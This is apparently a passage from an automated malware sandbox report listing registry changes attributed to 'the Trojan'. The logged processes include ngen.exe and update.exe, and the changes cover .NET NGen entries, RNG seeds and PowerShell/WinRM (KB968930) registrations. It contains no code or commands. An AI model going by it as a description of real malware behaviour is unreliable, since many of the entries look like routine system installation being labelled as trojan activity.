[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
The process ngen.exe:3436 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A3 29 A0 0C B7 6D CA 61 CF 2B 8E 39 A0 3A 05 D3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
"Priority" = "1"
The process ngen.exe:3940 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "72 66 81 B0 B4 27 25 80 D2 DB AE E7 6E 9C 45 20"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
The process ngen.exe:3488 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7A 69 BD E2 92 23 0B CF AA EC F9 61 05 DA F5 E2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
"Scenario" = "32"
The process ngen.exe:3932 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F9 52 31 86 62 CD 74 19 4F FE D1 43 BE 0F 9F 79"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
The process ngen.exe:3520 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9F EF 1A 04 EA 81 8F 3B 4D 55 6A 17 52 FA 7C C2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
The process ngen.exe:3528 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "51 3C 98 1F 1E 17 FA 1C 72 A6 EB 75 2D 27 6F 88"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
The process ngen.exe:3544 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A8 AB 6D 31 06 F7 B2 6F 9A 37 22 55 71 51 9A 9F"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
The process ngen.exe:3560 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C2 AC 32 63 9E AB CF 48 1E 69 A2 3E 9F 88 DE 0E"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
The process ngen.exe:3428 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2C 67 42 8C 82 D4 83 A5 AC C4 6D B9 B5 01 0F 96"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
The process ngen.exe:3460 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2E 7C 41 7A 5A AE 20 0F 53 2A C9 90 96 3C 3E D3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
"Status" = "3"
The process ngen.exe:3376 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "43 2D 62 51 AD 5E 75 23 68 0E 78 7E F4 AB 6F 37"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots]
"WorkPending" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
The process ngen.exe:3568 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E6 17 CC 65 2D 02 5D 6C 77 94 F8 C1 87 C7 44 FA"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
The process ngen.exe:3444 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D0 1E 81 ED 92 06 EC D6 E0 D4 15 84 97 53 8B DE"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
The process update.exe:1716 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"Description" = "Windows Management Framework Core"
[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\InprocServer32]
"ThreadingModel" = "Both"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"StackVersion" = "2.0"
[HKCR\Microsoft.PowerShellModule.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ]
"ControlFlags" = "1"
[HKCR\.psc1]
"(Default)" = "Microsoft.PowerShellConsole.1"
[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}]
"(Default)" = "IWSManHostEntrySink"
[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\InprocServer32]
"ThreadingModel" = "Both"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsGetSignature"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"
[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\Typelib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\Typelib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"PSCompatibleVersion" = "1.0,2.0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"NoModify" = "1"
[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\AppID\{3feb2f63-0eec-4b96-84ab-da1307e0117c}]
"(Default)" = "Microsoft Windows WSMan Provider Host"
[HKLM\System\CurrentControlSet\Services\Eventlog\System\KB968930]
"TypesSupported" = "7"
[HKCR\Microsoft.PowerShellModule.1]
"EditFlags" = "131072"
[HKCR\WSMan.InternalAutomation\CurVer]
"(Default)" = "WSMan.InternalAutomation.1"
[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}]
"(Default)" = "IWSManResourceLocator"
[HKCR\.ps1xml]
"PerceivedType" = "Text"
[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}]
"(Default)" = "IWSManConnectionOptions"
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"CategoryCount" = "8"
[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\FLAGS]
"(Default)" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup]
"LogLevel" = "536870912"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"
[HKCR\Microsoft.PowerShellScript.1]
"EditFlags" = "131072"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost]
"WINRM" = "WINRM"
[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"file" = "%WinDir%\System32\config\WindowsPowerShell.evt"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"
[HKCR\Microsoft.PowerShellScript.1\shell\Run with PowerShell\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell.exe -file %1"
[HKCR\AppID\{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}]
"LaunchPermission" = "01 00 04 80 98 00 00 00 A4 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
"EventMessageFile" = "%systemroot%\system32\WsmRes.dll"
[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}\LocalServer32]
"ServerExecutable" = "%System%\wsmprovhost.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\6b4:f63b8\iis]
"PathIISHelp" = "%WinDir%\Help\iishelp"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""
[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\InprocServer32]
"(Default)" = "%System%\winrssrv.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"PSModulePath" = "%System%\WindowsPowerShell\v1.0\Modules\"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\WINRM]
"CoInitializeSecurityParam" = "1"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell]
"Path" = "%System%\WindowsPowerShell\v1.0\powershell.exe"
[HKCR\Microsoft.PowerShellConsole.1]
"FriendlyTypeName" = "Windows PowerShell Console File"
[HKCR\Microsoft.PowerShellModule.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell_ise.exe %1"
[HKCR\WSMan.InternalAutomation]
"(Default)" = "WSMan InternalAutomation Class"
[HKCR\Microsoft.PowerShellData.1]
"FriendlyTypeName" = "Windows PowerShell Data File"
[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}\LocalServer32]
"(Default)" = "%System%\wsmprovhost.exe"
[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0]
"(Default)" = "Microsoft WSMAN Automation V1.0 Library"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\6b4:f63b8\iis]
"IISProgramGroup" = "Microsoft Internet Information Services"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\WINRM]
"AuthenticationCapabilities" = "12320"
[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\TypeLib]
"Version" = "1.0"
[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"Retention" = "0"
[HKLM\System\CurrentControlSet\Services\Eventlog\System\KB968930]
"EventMessageFile" = "%SystemRoot%\System32\spmsg.dll"
[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}]
"(Default)" = "PSFactoryBuffer"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PublishingGroup" = "Management and Infrastructure Group"
[HKCR\Microsoft.PowerShellConsole.1\shell\open\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell.exe -p %1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"Retention" = "0"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsPutSignature"
[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
"ParameterMessageFile" = "%systemroot%\system32\kernel32.dll"
[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}\NumMethods]
"(Default)" = "6"
[HKLM\System\CurrentControlSet\Services\WinRM]
"DependOnService" = "RPCSS, HTTP, HTTPFilter"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\6b4:f63b8\iis]
"PathInetsrv" = "%System%\inetsrv"
[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
"TypesSupported" = "7"
[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}]
"(Default)" = "IWSManEx"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"TSAware" = "1"
[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\AppID\{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}]
"(Default)" = "Microsoft Windows Remote Shell Host"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"UninstallCommand" = "%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe"
[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\InprocServer32]
"(Default)" = "%System%\WSMAUTO.DLL"
[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}\InprocServer32]
"ThreadingModel" = "Both"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ConsoleHostModuleName" = "%System%\WindowsPowerShell\v1.0\Microsoft.PowerShell.ConsoleHost.dll"
[HKCR\WSMan.Automation\CLSID]
"(Default)" = "{BCED617B-EC03-420b-8508-977DC7A686BD}"
[HKCR\WSMan.Automation.1\CLSID]
"(Default)" = "{BCED617B-EC03-420b-8508-977DC7A686BD}"
[HKLM\System\CurrentControlSet\Services\WinRM]
"Type" = "32"
[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational\EventForwarder-Operational]
"EventMessageFile" = "%systemroot%\system32\wevtfwd.dll"
[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\VersionIndependentProgID]
"(Default)" = "WSMan.Automation"
[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\6b4:f63b8\iis]
"PathWWWRoot" = "C:\Inetpub\wwwroot"
[HKLM\System\CurrentControlSet\Services\WinRM]
"DisplayName" = "Windows Remote Management (WS-Management)"
[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\TypeLib]
"Version" = "1.0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ\Regular]
"BitNames" = " rsError rsWarning rsTrace rsNone"
[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\0\win32]
"(Default)" = "%System%\WsmAuto.dll"
[HKCR\Microsoft.PowerShellConsole.1]
"EditFlags" = "131072"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstalledDate" = "7/16/2015"
"ReleaseType" = "Software Update"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKCR\WSMan.InternalAutomation.1\CLSID]
"(Default)" = "{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}"
[HKCR\WSMan.Automation\CurVer]
"(Default)" = "WSMan.Automation.1"
[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\ProgID]
"(Default)" = "WSMan.InternalAutomation.1"
[HKCR\.ps1xml]
"(Default)" = "Microsoft.PowerShellXmlData.1"
[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\NumMethods]
"(Default)" = "4"
[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
